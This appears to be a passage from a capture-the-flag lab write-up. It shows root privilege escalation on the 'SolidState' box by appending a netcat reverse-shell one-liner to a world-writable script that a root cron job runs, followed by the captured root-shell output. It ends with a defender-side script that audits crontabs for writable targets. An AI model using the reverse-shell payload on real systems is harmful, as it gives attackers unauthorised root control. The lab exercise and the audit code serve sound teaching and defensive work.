File Write


It was discovered that a cron job running as UID 0 executes a Python script, which turned out to be writable by anyone.

mindy@solidstate:/opt$ echo "os.system('mkfifo /tmp/ysphyy; nc 10.10.14.5 1234 0</tmp/ysphyy | /bin/sh >/tmp/ysphyy 2>&1; rm /tmp/ysphyy')" >> /opt/tmp.py

The Python script already imports the os and sys modules, so additional commands can be executed from within it.

Wrapping the payload in a call to the os.system() function and appending it to the bottom of the script embeds it in the script itself, so the payload runs, with the cron job's root privileges, every time the script is executed.

┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 43006
whoami
root
hostname
solidstate
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:3e:11 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3e11/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:3e11/64 scope link 
       valid_lft forever preferred_lft forever

A moment later, I get a root shell.
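As an added defender-side example (not part of the original writeup), the following script audits system-crontab entries for the condition exploited here: a file that root's cron executes but that some other account can modify. The crontab text and file metadata are constructed samples; pass os.stat as stat_fn to run the same checks against a real host's /etc/crontab and /etc/cron.d files.

```python
import re
import stat
from types import SimpleNamespace

# One system-crontab entry per line: five time fields (or @reboot, @daily, ...),
# the user the job runs as, then the command. Comment lines are skipped.
CRON_RE = re.compile(r"^[ \t]*(?!#)(?:@\w+[ \t]+|(?:\S+[ \t]+){5})(\S+)[ \t]+(.*)$", re.MULTILINE)


def check_path(path, user, stat_fn):
    """Return (path, reason) if a non-root account could alter a file this job runs, else None."""
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return None  # missing target: nothing to assess here
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return path, "group/world-writable"
    if user == "root" and st.st_uid != 0:
        return path, f"owned by uid {st.st_uid} but run as root"
    return None


def audit_crontab(text, stat_fn):
    """Check every absolute path mentioned in each entry; returns a list of (path, reason)."""
    findings = []
    for m in CRON_RE.finditer(text):
        user, command = m.groups()
        for tok in command.split():  # interpreter and script arguments are both checked
            if tok.startswith("/"):
                hit = check_path(tok, user, stat_fn)
                if hit:
                    findings.append(hit)
    return findings


# Constructed sample crontab and fake file metadata; not taken from the target machine.
SAMPLE_CRONTAB = """SHELL=/bin/sh
*/3 * * * * root python /opt/tmp.py
0 * * * *   root /usr/local/bin/backup.sh
@reboot     root /var/tmp/cleanup.sh
"""
FAKE_FS = {
    "/opt/tmp.py": SimpleNamespace(st_mode=0o100777, st_uid=0),  # anyone can append to it
    "/usr/local/bin/backup.sh": SimpleNamespace(st_mode=0o100755, st_uid=1000),  # user-owned
}


def fake_stat(path):
    if path in FAKE_FS:
        return FAKE_FS[path]
    raise FileNotFoundError(path)
```

A fuller audit would also flag a world-writable parent directory without the sticky bit, since that lets any user delete and recreate the script even when the file itself is mode 0755.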

System Level Compromise